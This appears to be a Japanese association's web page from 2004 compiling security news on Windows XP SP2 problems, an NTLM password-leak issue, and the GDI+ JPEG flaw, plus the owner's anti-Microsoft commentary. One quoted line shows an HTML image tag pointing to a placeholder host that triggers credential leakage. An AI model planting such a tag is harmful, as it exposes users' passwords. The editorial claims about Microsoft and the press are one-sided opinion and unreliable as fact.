インターネットセキュリティー・ウイルス情報(2004/10/5)
★Microsoft Windows XP SP2 FAQ テンプレ 導入結果報告★
不具合に遭いたくなければ、SP2は上書きするな!時間があるときにクリーンインスコしる!
(以下略)
Windows XPに「勝手にパスワード情報を送信する危険性」が見つかる
Windows XPに,ユーザーが知らないうちに外部のサーバーに対してパスワード情報を送信してしまうという危険性が存在することが明らかになった。ネットワーク管理ツール・ベンダーのセキュリティフライデーが発見し,セキュリティ関連のメーリング・リスト「NTBugtraq」に報告した。「悪意のあるユーザーに,パスワードを知られてしまう危険性がある」(同社技術企画室長の関英信氏)という。
これを発見した同社関氏によると,危険性はOffice 2000/XP/2003がインストールされているWindows XPマシンに関するもの。ファイル共有が有効になっているWindows ServerのIIS(Internet Infomation Services)に対して,Windows XPマシンからHTTPで接続し,IIS上で公開されているWordファイル(拡張子Doc)を直接開くと,Windows XPマシンがこのWindows Serverに対してNTLM認証を試みようとする。
(中略)
・・・今回発見されたWordに関する仕様や,「<img src=file://\\www.xxx.yyy\test>」というイメージ・タグを含むHTMLファイルをブラウズした場合に,サーバーに対してパスワード情報を送信してしまう仕様については,修正パッチは提供されていない。
<2004年9月24日 マイクロソフト サポート技術情報>
Windows XP SP2 を適用すると Web ページで文字化けが発生する
この資料は、Windows XP SP2 上での Internet Explorer6 においてスクリプトエラーが発生したり、コンテンツが一部文字化けする現象に関して説明したものです。(以下略)
<2004年9月24日 ITediaエンタープライズ>
1週間前に登場したIEのJPEG脆弱性実証コードを上回る、さらに危険なコードが公開された。(IDG)
MicrosoftのInternet Explorer(IE)で最近発見された脆弱性を突く新しいコンピュータコードがインターネットに出回っている。ウイルス対策企業やセキュリティ専門家によると、攻撃者がリモートから脆弱性のあるWindowsマシンを完全に乗っ取ることができてしまう可能性がある。
新たな「コンセプト実証」型プログラム2種類は9月22日に出現、セキュリティ専門家が参照しているWebサイトとニュースグループに掲載された。これより以前にもこの脆弱性の実証コードが出現しているが、今回のコードの方が危険度は高いという。Windowsシステムをフリーズさせたりクラッシュさせるだけにとどまらず、攻撃者が自分のコードを実行できてしまうと、SANS Institute Internet Storm Centerのヨハネス・ウルリッチCTOは解説する。(以下略)
<2004.9/21 がんばれ!!ゲイツ君>
未知との遭遇SP2(その2)(後編) 〜1/3の修正の理由
先週、MSからWindowsXPの脆弱性のアナウンスがありましたね。
これ、悪意のあるJPEGファイルを閲覧すると、任意のコードを実行できてしまうというもので、影響度の高さから見たら史上最高のセキュリティホールの一つかもしれません。WindowsXP以降に含まれているGDI+ライブラリのバグで、このライブラリを使っているものは全滅です。またGDI+を使っている他社の製品も当然同じ目に遭うわけですからいやはや気が遠くなりそうですね。スパムメールの中身をうっかり見たら最後、ハードディスクの中身が全消去なんてことにもなりかねません。
しかしこれ、JPEGのコメント部の処理がタコだったために起きた不具合とのことですが、、、この会社はなんでこんな初歩的なミスをやるんでしょうかね。これ、今年入社した新人とかにプログラミングさせてませんかねゲイツ君。ま、新人の教育というのも大切だというのは解りますが、まだメスも持ったこともないような医者に全世界のユーザが開腹手術の実験台にされているようなものですから勘弁してもらいたいものです。以前MozillaやFireFoxの脆弱性がニュースになりましたが、今回のは影響範囲がでかすぎますからね。(以下略)
<2004/09/15 IT Mediaエンタープライズ>
Windows PCのJPEGフォーマット処理方法に重大な欠陥
MicrosoftはJPEGの処理方法に発見されたセキュリティホールを修正するパッチをリリースした。多くの同社アプリケーションについても、修正するためのツールを提供している。
Microsoftは14日(米国時間)、同社ソフトウェアのJPEG画像フォーマット処理方法に見つかった重大なセキュリティホールを修正するパッチをリリースした。また顧客に対し、新たに提供したツールを利用して、脆弱性のある多数のアプリケーションを修正するよう呼びかけている。
この「緊急」レベルの欠陥は、Microsoftのオペレーティングシステム(OS)やその他のソフトウェアが、広く普及しているJPEG画像フォーマットを扱う際の方法に存在する。攻撃者がJPEG画像ファイルに細工を施すと、画像ファイルが開かれた瞬間に被害者のコンピュータ上で悪質なプログラムを実行されてしまうおそれがあるという。MicrosoftのInternet Explorer(IE)にもこの脆弱性が存在するため、Windowsユーザーは、細工が施された画像を含むウェブサイトを開くだけで、被害に遭う可能性がある。(以下略)
<2004年 9月17日 マイクロソフト>
2004 年 9 月リリースの JPEG 処理 (GDI+) のセキュリティ更新プログラム
公開日 : 2004 年 9 月 15 日 更新日: 2004年 9月17日
2004 年 9 月にリリースされる GDI+ のセキュリティ更新プログラムにより、JPEG処理技術に確認された新たな問題が解決されます。この問題により、この画像形式をサポートする Microsoft Windows、Microsoft Office、Microsoft 開発ツールなどのソフトウェアに影響が及びます。コンピュータにこれらのソフトウェアがインストールされている場合、関連の更新プログラムをインストールする必要があります。
使用しているソフトウェアによっては、複数の場所から複数の更新プログラムをインストールする必要がある場合があります。
より確実に更新プログラムを適用するための詳細な情報は、以下のページをご覧下さい。(以下略)
<2004.9/13 がんばれ!!ゲイツ君>
223未知との遭遇SP2 〜あなたはこの危機を乗り越えられるか
私の所にもいろいろ情報を頂いておりますが、怖い物見たさにインストールされた方の間ではもう阿鼻叫喚の修羅場となっているようで(^^;、そう言えば昔WindowsNTのSP2が出た時も大騒ぎした記憶があったのですが、どうも質の悪さはそれ以外ではないかともっぱらの評判です。
ま、MSは非難を浴びるのは仕方が無いとは思いますが、PCメーカーやソフトのベンダーに取ってみれば頼みもしないのによけいなものをリリースしてくれたおかげでサポートの手間がやたら増えて大迷惑でしょうね。
例えば、ちょっと富士通のサイトを見てみたのですが、WindowsXPとSP2というキーワードで検索すると山ほどトラブル事例が出てきます。例えば、IEEE1394がいきなり使えなくなるなんて事例もあるようで。これ、富士通は「お使いになれません」なんて言っていますが、こんな後出しジャンケンみたいな言い方で済まされるわけ無いと思うんですけれどね。今まで使っていて機器も持っている人はどうしろって言うんでしょうか。まぁMacだと使えるのでこの際そっちに乗り換えてくれという意味なのかもしれませんけれど(^^;。
あとは、デスクトップがいきなりクリアされたという話もよく聞きますね。ショートカットを配置していた人に取ってみればかなり災難ですが。そう言えばSP2ではなく、素のWindowsXPを入れたらデスクトップにゴミ箱以外きれいさっぱり消えてしまったなんて情報も頂いたことがあります。そう言えばゲイツ君は以前「これからはセキュリティに力を入れる」なんて言っておりましたが、ゴミ箱だけでものが何もなければそりゃ情報漏洩も何も無いですわね。(以下略)
<2004.9/27 がんばれ!!ゲイツ君>
先週、WindowsXPのSP2のダウンロードが開始されたようですが、予想通りかなり問題が発生しているようで(導入したPCの10%で不具合が発生だとか。いやはや)、最悪PCがフリーズしたり、二度と起動が出来なくなったなんて例もあるようです。
これ、容量的にも90M以上ありますし、インストールするのも2時間かかったという報告もありますので、まぁ仕事でSP2の検証をしなければならないという人以外は導入はやめておくべきでしょうね。仕事でもこんなことやりたくないですが(しかしゲイツ君も相変わらず予想通りのことをやってくれますね。ベータテストって一体何をやっていたんだか。)
ところで、インストールをしたくないと言っても、ネットに繋いでいるとWindowUpdateで自動的にインストールしろしろと盛んに言って来るのでついに根負けしてインストールをしてしまうという人も多いかもしれません。で、最近MSはとうとうSP2のタコさ加減を認識されたのか、そういう根性の無い方向け(笑)にインストールを無効化する方法なるものを公開したようです。これ、セキュリティパッチの一種ですかね(^^;。ま、こういうことをやるよりSPのリリースの考え方を改善するべきですが、無いよりはマシでしょうね。(以下略)
<2004/09/02 窓の杜NEWS>
マイクロソフト、Windows XP SP2へのアップデートを無効化する方法を公開
“Windows Update”および自動更新機能でのアップデートが12月14日まで無効に
専用ツールのダウンロードページ
マイクロソフト(株)は2日、“Windows Update”および自動更新機能を利用した「Windows XP Service
Pack 2 セキュリティ強化機能搭載(以下、XP SP2)」へのアップデートを、期限つきで無効化する方法を公開した。無効化する方法は簡単で、同社Webサイトに公開されている専用ツールをダウンロード・実行するだけ。
企業ユーザーは、業務アプリケーションなどとの互換性を調査するために、OSのService Packが公開されてもしばらく適用を見合わせることが多い。とくに、XP SP2では多くの新機能・仕様変更が施されるため、互換性の問題はより大きくなるだろう。
(以下略)
<2004年8月9日 ITediaエンタープライズニュース>
IBMは社内向けの通知で、Windows XP SP2が既存アプリケーションと互換性問題を起こすことを理由に、SP2がリリースされてもダウンロードしないよう指示している。(IDG)
Microsoftの開発者はWindows XP Service Pack 2(SP2)の作業完了を祝っているところかもしれないが、世界中のIT部門は今、このアップデートを自社システムにインストールすべきかどうかという疑問を抱えている。
例えばIBMは、SP2のインストールを控える方針だ。同社は8月6日にイントラネットに掲載した「パッチをあてるべきか否か」という通知で、互換性問題を理由に、従業員にSP2がリリースされてもダウンロードしないよう伝えている。この通知のコピーをIDG News Serviceは入手した。
「このパッチはほかのWindows XPユーザーには朗報かもしれないが、IBMはSP2をインストールしないよう命じる」とこの通知には記されている。40万台近くのデスクトップを有するIBMは、Microsoftの大口顧客だ。(以下略)
しばらくお休みしていましたが、ぼちぼち再開いたします。 2004.10.5
全国精労協へのウイルスメールは少なくとも6,000に達しました! まったく自慢になりませんが.comアドレスには世界からたくさんの迷惑メールが送られてきます。2004年4・5月には1日で100通近く届いたこともありました。
当サイトはMacで運営しているので、大丈夫です。しかしそれでもあまりにもうっとうしいので、プロバイダでウイルスチェックしてもらっています。
特にWindowsを使っている方にはプロバイダにウイルスチェックを依頼することをお勧めします。
それでもウイルスの流行のスピードは上回ることがあります。全国精労協に29日時点ではワクチンソフトメーカーの
ウイルス対応はまだできておらず、(3月30日対応)新種のウイルスがプロバイダのチェックをくぐり抜けています。
全国精労協はMacなので感染はしていません。
プロバイダのウイルスチェックはメールアドレスごとなので複数のアドレス登録をしている場合はそれぞれ手続きが必要です。料金設定はプロバイダの差があり、300円〜無料/月ぐらいです。
しばらくお休みしていましたが、ぼちぼち再開いたします。 2002.5.6
昨年11月にウイルスが世界に、日本にまん延しました。精労協のアドレスだけでも24通のウイルスが届きました。個人の方ではメーリングリスト含めて、6通です。しかし、感染はしていません。
ウインドウズユーザー友人の多くはウイルス対策に大変だったようです。とくにパソコン初心者の方は何がどうなっているのか分からないようでした。こんな高い電化製品なのに何で簡単に壊れるんでしょ。しかも、人から迷惑がられるなんて、ひどいですね。
このホームページはマックで作っているので、感染の可能性は極めて低いのです。世界のウイルスは56000種類ほどあり、そのうちマックで感染するのは6000種ぐらいです。その上、NortonAntivirus ウイルス対策をし、問題のOutlookExpressやInternetExplorerも使っていないので、ほとんどウイルスフリー環境でらくちんです。やはり、マイクロソフト自体がウイルスの温床であるとの認識を新たにしました。皆さんも、少なくとも、メールソフトだけでも変えてみたらいかがでしょうか。それだけで、最近のウイルスの8割は予防できます。Becky! や Edmax 、Eudra シリーズやPostPet 、NetscapeComunicaterなどいくらでもあります。
こういう書き方が、不評でしてまた叱られそう。主にマックユーザーから、「ウインドウズユーザーに嫌われるよ」なんて警告を受けていたものでした。11月のウイルスのまん延はそれは大規模だったので、とくに、このコーナーで紹介するまでもなくなったこと、キリがなくて、更新が面倒になって、お休みしていました。ところが、このホームページをリンクしてくれた当事者のサイトで意外に評価されていたのに気を良くして、ぼちぼち再開しようと思います、はい。
お気づきのように、これらのセキュリティーホールの多くの対象はMicrosoftのOutlook,Outlook Expressであり、Internet Explorerや MS Wrod,Excelサーバー用ソフトIIS,そして時にはWindowsの自身です。共通項はMicrosoftです。最も感染の機会が多いのはOutlook,Outlook Expressです。有名な「I Love You」ウイルスや「メリッサ」最近の「サーカム」はそのメールソフトでしか感染しません。ところがそれらがマイクロソフトのソフトでしか感染しないとの情報は、日本のメジャーなマスコミではほとんど報道されません。マイクロソフトはパソコンのOSの9割近くを独占し、逆らうとどんな報復を受けるかわかわないという事態が予測されるからです。日本では中村正三郎のWindouws3.1への批判をのせた技術評論社が出入り禁止措置を受けかけた「電脳曼陀羅事件」は有名です。マスコミ関係は、マイクロソフトからの情報提供を受ける代わり、批判しないことを求められます。提携企業はその契約までさせられます。
ビルゲイツ一人の資産は7兆円を超えています。これは韓国の国家予算に匹敵します。全世界の人に、ゲイツ君が、1000円づつ配ってもまだ余ってしまいます。MSは現代最大の独占資本です。暗黒の帝国にもたとえられます。ビル・ゲイツがIBMにMS-DOSを売りこんだときから、すでに他のプログラマーのパクりが始まっています。それ以来、優れた技術を持っている企業に対しては買収して取り込み、出資してMSに逆らえなくさせます。それでも軍門に降らない企業に対しては、膨大な開発費用を度外視して、相手企業のソフト価格より安いどころか、タダで配付。Internet ExplorerのようにWindowsと切り離せないようにして、Netscapeを使わせないようにするなどあらゆる手段で叩き潰しにかかります。アメリカ連邦政府司法省に訴えられ、独占禁止法で被告になり有罪判決をうけたことは有名です。
Microsoft以外のOSやソフトも危険性がないわけではありませんが、Microsoftの製品は技術自体がツギハギを重ね、バグの修復が困難であり、いくらでもセキュリティーホールが見つかってしますのです。マイクロソフト製品はパソコン本体に組み込まれて販売され、度重なるバージョンアップで利益をあげるのですが、多くの人はメジャーバージョンアップの度にトラブルに遭うといいます。とりわけWindowsの95→98のバージョンアップでは約半数の人が、周辺機器を認識しない、システムが起動しないなどのトラブルで泣く泣くデータを救うこともできずハードディスクの初期化を余儀なくされたようです。大手の松下やキヤノンでは、業務への支障が大きいため、Windows95から98へのバージョンアップ禁止令がでたほどです。(98の新機種購入は可)
これらは現役プログラマーのMS
Watchやがんばれ!!ゲイツ君に詳しく連載されています。
もっと良く知りたい方は、
- ◆ 「ウイルス伝染(うつ)るんです」 中村正三郎著(廣済堂出版) 価格:1500円 ISBN4-331-50771-8
- ◆「マイクロソフト・シンドローム」 外崎 則夫・梅津 信幸 著 定価1200円+税 オーエス出版社 刊 ISBN 4-87190-810-0 C0036 書評
MS-Wordを使用している方へ朗報!
知の道具箱 旧称 : MS-Word用フリーソフト
- MS-Word には、バグのほかに、本質的な欠陥があります。
- それによって、保存・編集・印刷・表示などの際、データの一部が消えてしまいます。それを解決するフリーソフトです。
「欠陥解決モジュール ver 3.0c」 (Word 95,97,98,2000 用)